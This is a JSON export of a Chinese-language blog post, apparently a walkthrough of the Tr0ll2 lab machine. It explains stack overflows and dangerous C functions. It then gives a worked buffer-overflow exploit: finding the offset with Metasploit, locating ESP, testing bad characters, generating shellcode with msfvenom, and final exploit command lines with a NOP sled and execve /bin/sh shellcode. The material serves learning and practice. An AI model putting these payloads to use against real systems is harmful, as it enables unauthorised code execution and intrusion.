{"id":281,"date":"2024-05-01T17:10:58","date_gmt":"2024-05-01T09:10:58","guid":{"rendered":"http:\/\/xiyu12.top\/?p=281"},"modified":"2024-05-01T17:10:58","modified_gmt":"2024-05-01T09:10:58","slug":"tr0ll2","status":"publish","type":"post","link":"http:\/\/www.xiyu12.top\/?p=281","title":{"rendered":"Tr0ll2"},"content":{"rendered":"\n

pwn<\/h2>\n\n\n\n
\u53ef\u5229\u7528\u7684\u6808\u6ea2\u51fa\u8986\u76d6\u4f4d\u7f6e\u901a\u5e38\u67093\u79cd\uff1a \u2460\u8986\u76d6\u51fd\u6570\u8fd4\u56de\u5730\u5740\uff0c\u4e4b\u524d\u7684\u4f8b\u5b50\u90fd\u662f\u901a\u8fc7\u8986\u76d6\u8fd4\u56de\u5730\u5740\u63a7\u5236\u7a0b \u5e8f\u3002 \u2461\u8986\u76d6\u6808\u4e0a\u6240\u4fdd\u5b58\u7684BP\u5bc4\u5b58\u5668\u7684\u503c\u3002\u51fd\u6570\u88ab\u8c03\u7528\u65f6\u4f1a\u5148\u4fdd\u5b58\u6808\u73b0 \u573a\uff0c\u8fd4\u56de\u65f6\u518d\u6062\u590d\uff0c\u5177\u4f53\u64cd\u4f5c\u5982\u4e0b\uff08\u4ee5x64\u7a0b\u5e8f\u4e3a\u4f8b\uff09\u3002\u8c03\u7528\u65f6\uff1a \u8fd4\u56de\u65f6\uff1a\u5982\u679c\u6808\u4e0a\u7684BP\u503c\u88ab\u8986\u76d6\uff0c\u90a3\u4e48\u51fd\u6570\u8fd4\u56de\u540e\uff0c\u4e3b\u8c03\u51fd\u6570\u7684 BP\u503c\u4f1a\u88ab\u6539\u53d8\uff0c\u4e3b\u8c03\u51fd\u6570\u8fd4\u56de\u6307\u884cret\u65f6\uff0cSP\u4e0d\u4f1a\u6307\u5411\u539f\u6765\u7684\u8fd4\u56de\u5730\u5740 \u4f4d\u7f6e\uff0c\u800c\u662f\u88ab\u4fee\u6539\u540e\u7684BP\u4f4d\u7f6e\u3002 \u2462\u6839\u636e\u73b0\u5b9e\u6267\u884c\u60c5\u51b5\uff0c\u8986\u76d6\u7279\u5b9a\u7684\u53d8\u91cf\u6216\u5730\u5740\u7684\u5185\u5bb9\uff0c\u53ef\u80fd\u5bfc\u81f4 \u4e00\u4e9b\u903b\u8f91\u6f0f\u6d1e\u7684\u51fa\u73b0\u3002<\/code><\/pre>\n\n\n\n
\u901a\u8fc7\u5bfb\u627e\u5371\u9669\u51fd\u6570\uff0c\u6211\u4eec\u53ef\u4ee5\u5feb\u901f\u786e\u5b9a\u7a0b\u5e8f\u662f\u5426\u53ef\u80fd\u6709\u6808\u6ea2\u51fa\uff0c \u4ee5\u53ca\u6808\u6ea2\u51fa\u7684\u4f4d\u7f6e\u3002\u5e38\u89c1\u7684\u5371\u9669\u51fd\u6570\u5982\u4e0b\u3002 \u2756 \u8f93\u5165\uff1agets()\uff0c\u76f4\u63a5\u8bfb\u53d6\u4e00\u884c\uff0c\u5230\u6362\u884c\u7b26'\\n'\u4e3a\u6b62\uff0c\u540c \u65f6'\\n'\u88ab\u8f6c\u6362\u4e3a'\\x00'\uff1bscanf()\uff0c\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u4e2d\u7684%s\u4e0d\u4f1a \u68c0\u67e5\u957f\u5ea6\uff1bvscanf()\uff0c\u540c\u4e0a\u3002 \u2756 \u8f93\u51fa\uff1asprintf()\uff0c\u5c06\u683c\u5f0f\u5316\u540e\u7684\u5185\u5bb9\u5199\u5165\u7f13\u51b2\u533a\u4e2d\uff0c\u4f46\u662f\u4e0d \u68c0\u67e5\u7f13\u51b2\u533a\u957f\u5ea6\u3002 \u2756 \u5b57\u7b26\u4e32\uff1astrcpy()\uff0c\u9047\u5230'\\x00'\u505c\u6b62\uff0c\u4e0d\u4f1a\u68c0\u67e5\u957f\u5ea6\uff0c\u7ecf\u5e38\u5bb9 \u6613\u51fa\u73b0\u5355\u5b57\u8282\u51990\uff08off by one\uff09\u6ea2\u51fa\uff1bstrcat()\uff0c\u540c\u4e0a<\/code><\/pre>\n\n\n\n
\u6808\u6ea2\u51fa \u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e\n\u8d77\u56e0\uff1a strcpy(dest, argv[1]); \u5bf9\u8f93\u5165\u7684\u5185\u5bb9\u6ca1\u6709\u9650\u5236\u3002\u8f93\u5165\u7684\u5185\u5bb9 \u586b\u6ee1\u7f13\u51b2\u533a\u4e4b\u540e \u6ea2\u51fa\u5230\u5176\u4ed6\u7684\u4f4d\u7f6e\n\n\u51fd\u6570\u7684\u6267\u884c \u7684\u8c03\u7528\u987a\u5e8f\u548c \u6808\u7684\u8c03\u7528\u5faa\u5e8f\u662f\u4e00\u6837\n\u7531\u4e8e\u51fd\u6570\u8c03\u7528\u7684\u5faa\u5e8f\u4e5f\u662f\u6700\u5148\u8c03\u7528\u7684\u51fd\u6570\u6700\u540e\u8fd4\u56de\uff0c\u56e0\u6b64\u6808\u975e\u5e38\u9002\u5408\u4fdd\u5b58\u51fd\u6570\u8fd0\u884c\u8fc7\u7a0b\u4e2d\u4f7f\u7528\u5230\u7684\u4e2d\u95f4\u53d8\u91cf\u548c\u5176\u4ed6\u4e34\u65f6\u6570\u636e\u3002 \u76ee\u524d\uff0c\u5927\u90e8\u5206\u4e3b\u6d41\u6307\u4ee4\u6784\u67b6\uff08x86\u3001ARM\u3001MIPS\u7b49\uff09\u90fd\u5728\u6307\u4ee4\u96c6\u5c42\u9762\u652f\u6301\u6808\u64cd\u4f5c\uff0c\u5e76\u4e14\u8bbe\u8ba1\u6709\u4e13\u95e8\u7684\u5bc4\u5b58\u5668\u4fdd\u5b58\u6808\u9876\u5730\u5740\u3002\u5927\u90e8\u5206\u60c5\u51b5 \u4e0b\uff0c\u5c06\u6570\u636e\u5165\u6808\u4f1a\u5bfc\u81f4\u6808\u9876\u4ece\u5185\u5b58\u9ad8\u5730\u5740\u5411\u4f4e\u5730\u5740\u589e\u957f\n\n\u51fd\u6570 \u4ee5\u6808\u7684\u7ed3\u6784 \u5b58\u50a8\u5728\u5185\u5b58\u4e2d \u5f53\u51fd\u6570\u7684\u8f93\u5165\u503c\u8986\u76d6\u5230\u5176\u4ed6\u4f4d\u7f6e\u65f6\uff0c\u5728\u51fd\u6570\u8fd4\u56de\u5730\u5740\u7684\u5185\u5bb9\u4f1a\u88ab\u5f53\u6210\u4e0a\u4e00\u4e2a\u51fd\u6570\u7684\u5185\u5bb9\u6267\u884c<\/code><\/pre>\n\n\n\n
<\/p>\n\n\n\n
\u6240\u4ee5\u5148\u627e\u5230\u504f\u79fb\u91cf \u5c06\u7f13\u51b2\u533a\u586b\u6ee1\n\u7136\u540e 4\u4e2aB \u627e\u5230 EIP\u5730\u5740\n\u7136\u540e 20\u4e2aC \u627e\u5230 ESP\u5730\u5740\n\n\u6784\u9020\u4e00\u4e2a \u5229\u7528\u94fe \u7f13\u51b2\u533a+\u53cd\u5411esp+nop\u503c+shellcode<\/code><\/pre>\n\n\n\n
\u4e00\u3001\u504f\u79fb\u91cf<\/h2>\n\n\n\n
\u504f\u79fb\u91cf\u901a\u8fc7\u8f93\u5165\u4e00\u6bb5\u5b57\u7b26 \u7136\u540e\u901a\u8fc7\u6ea2\u51fa\u7684\u5730\u5740\u4e0e\u5b57\u7b26\u4e32\u8d77\u70b9\u8fdb\u884c\u51cf\u6cd5\u5f97\u5230<\/p>\n\n\n\n
\u4e00\u6bb5\u5177\u6709\u89c4\u5f8b\u7684\u5b57\u7b26\u4e32\u4e2d\uff0c\u5b50\u5b57\u7b26\u4e32 6a413969<\/code> \u7684\u8d77\u59cb\u4f4d\u7f6e\u8ddd\u79bb\u5b57\u7b26\u4e32\u5f00\u5934\u7684\u504f\u79fb\u91cf\u4e3a 268<\/p>\n\n\n\n
locate pattern_create.rb\n\/usr\/share\/metasploit-framework\/tools\/exploit\/pattern_create.rb -l 300 \ngdb r00t\nr Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9\n\n\/usr\/share\/metasploit-framework\/tools\/exploit\/pattern_offset.rb -q  0x6a413969\n[*] Exact match at offset 268\n\n<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u4e8c\u3001esp\u5730\u5740<\/h2>\n\n\n\n
print\u5199\u5165268\u4e2aA\u548c4\u4e2aB\uff0c\u67e5\u627e\u51faEIP\u5730\u5740\n\nr $(python -c 'print (\"A\"*268 + \"B\"*4)')\ninfo r\n\nprint\u5199\u5165268\u4e2aA\u30014\u4e2aB\u548c20\u4e2aC\uff0c\u67e5\u627e\u51faESP\u5730\u5740\uff1a\n\nr $(python -c 'print (\"A\"*268 + \"B\"*4 + \"C\"*20)')\n\u83b7\u53d6ESP\u5185\u5b58\u5730\u5740\uff1a0xbffffb80\n\u5373\u53cd\u5411ESP\u4e3a\uff1a\\x80\\xfb\\xff\\xbf<\/code><\/pre>\n\n\n\n
\u4e09\u3001shellcode&badchars<\/h2>\n\n\n\n
git clone  https:\/\/github.com\/cytopia\/badchars.git\ncd badchars\n.\/badchars  -f ruby\nbadchars = (\n  \"\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\\x0e\\x0f\\x10\" +\n  \"\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\\x1c\\x1d\\x1e\\x1f\\x20\" +\n  \"\\x21\\x22\\x23\\x24\\x25\\x26\\x27\\x28\\x29\\x2a\\x2b\\x2c\\x2d\\x2e\\x2f\\x30\" +\n  \"\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x3a\\x3b\\x3c\\x3d\\x3e\\x3f\\x40\" +\n  \"\\x41\\x42\\x43\\x44\\x45\\x46\\x47\\x48\\x49\\x4a\\x4b\\x4c\\x4d\\x4e\\x4f\\x50\" +\n  \"\\x51\\x52\\x53\\x54\\x55\\x56\\x57\\x58\\x59\\x5a\\x5b\\x5c\\x5d\\x5e\\x5f\\x60\" +\n  \"\\x61\\x62\\x63\\x64\\x65\\x66\\x67\\x68\\x69\\x6a\\x6b\\x6c\\x6d\\x6e\\x6f\\x70\" +\n  \"\\x71\\x72\\x73\\x74\\x75\\x76\\x77\\x78\\x79\\x7a\\x7b\\x7c\\x7d\\x7e\\x7f\\x80\" +\n  \"\\x81\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8a\\x8b\\x8c\\x8d\\x8e\\x8f\\x90\" +\n  \"\\x91\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9a\\x9b\\x9c\\x9d\\x9e\\x9f\\xa0\" +\n  \"\\xa1\\xa2\\xa3\\xa4\\xa5\\xa6\\xa7\\xa8\\xa9\\xaa\\xab\\xac\\xad\\xae\\xaf\\xb0\" +\n  \"\\xb1\\xb2\\xb3\\xb4\\xb5\\xb6\\xb7\\xb8\\xb9\\xba\\xbb\\xbc\\xbd\\xbe\\xbf\\xc0\" +\n  \"\\xc1\\xc2\\xc3\\xc4\\xc5\\xc6\\xc7\\xc8\\xc9\\xca\\xcb\\xcc\\xcd\\xce\\xcf\\xd0\" +\n  \"\\xd1\\xd2\\xd3\\xd4\\xd5\\xd6\\xd7\\xd8\\xd9\\xda\\xdb\\xdc\\xdd\\xde\\xdf\\xe0\" +\n  \"\\xe1\\xe2\\xe3\\xe4\\xe5\\xe6\\xe7\\xe8\\xe9\\xea\\xeb\\xec\\xed\\xee\\xef\\xf0\" +\n  \"\\xf1\\xf2\\xf3\\xf4\\xf5\\xf6\\xf7\\xf8\\xf9\\xfa\\xfb\\xfc\\xfd\\xfe\\xff\"\n)\nr $(python -c 'print (\"A\"*268 + \"B\"*4)+badchars')\n    <\/code><\/pre>\n\n\n\n
https:\/\/shell-storm.org\/shellcode\/index.html<\/a><\/p>\n\n\n\n
http:\/\/shell-storm.org\/shellcode\/files\/shellcode-827.php<\/p>\n\n\n\n
“\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80″‘)<\/p>\n\n\n\n
 msfvenom --platform linux -p linux\/x86\/exec -f python CMD=\"\/bin\/sh\" -b '\\x00' -a x86\nmsfvenom -p linux\/x86\/exec CMD=\"\/bin\/sh\" -f raw\n<\/code><\/pre>\n\n\n\n
\u7f16\u5199EXP\uff1a<\/p>\n\n\n\n
.\/r00t $(python -c 'print \"A\"*\u504f\u79fb\u91cf + \"\u53cd\u5411ESP\" + \"\\x90\"*20 + \"shellcode\"')\n.\/r00t $(python -c 'print \"A\"*268 + \"\\x80\\xfb\\xff\\xbf\" + \"\\x90\"*20 + \"\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\"')\n\n\u7f16\u5199\u6f0f\u6d1e\u5229\u7528\u7a0b\u5e8f\u3002\uff08A * 268\uff09\uff08shell\u504f\u79fb\u91cf\uff09\uff08nop sled\uff09\uff08shellcode\uff09\n.\/r00t $(python -c \"print 'A' * 268 + '\\x90\\xfb\\xff\\xbf' + '\\x90' * 100 + '\\xba\\x44\\x81\\xb3\\x61\\xdb\\xd6\\xd9\\x74\\x24\\xf4\\x5e\\x2b\\xc9\\xb1\\x0b\\x83\\xee\\xfc\\x31\\x56\\x11\\x03\\x56\\x11\\xe2\\xb1\\xeb\\xb8\\x39\\xa0\\xbe\\xd8\\xd1\\xff\\x5d\\xac\\xc5\\x97\\x8e\\xdd\\x61\\x67\\xb9\\x0e\\x10\\x0e\\x57\\xd8\\x37\\x82\\x4f\\xd2\\xb7\\x22\\x90\\xcc\\xd5\\x4b\\xfe\\x3d\\x69\\xe3\\xfe\\x16\\xde\\x7a\\x1f\\x55\\x60'\")\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
pwn \u4e00\u3001\u504f\u79fb\u91cf \u504f\u79fb\u91cf\u901a\u8fc7\u8f93\u5165\u4e00\u6bb5\u5b57\u7b26 \u7136\u540e\u901a\u8fc7\u6ea2\u51fa\u7684\u5730\u5740\u4e0e\u5b57\u7b26\u4e32\u8d77\u70b9\u8fdb\u884c\u51cf\u6cd5\u5f97\u5230 \u4e00\u6bb5\u5177\u6709\u89c4\u5f8b\u7684\u5b57\u7b26\u4e32\u4e2d […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[90,112,115],"class_list":["post-281","post","type-post","status-publish","format-standard","hentry","category-target-aircraft","tag-strcpy","tag-112","tag-115"],"_links":{"self":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/281","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=281"}],"version-history":[{"count":0,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/281\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=281"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=281"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=281"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}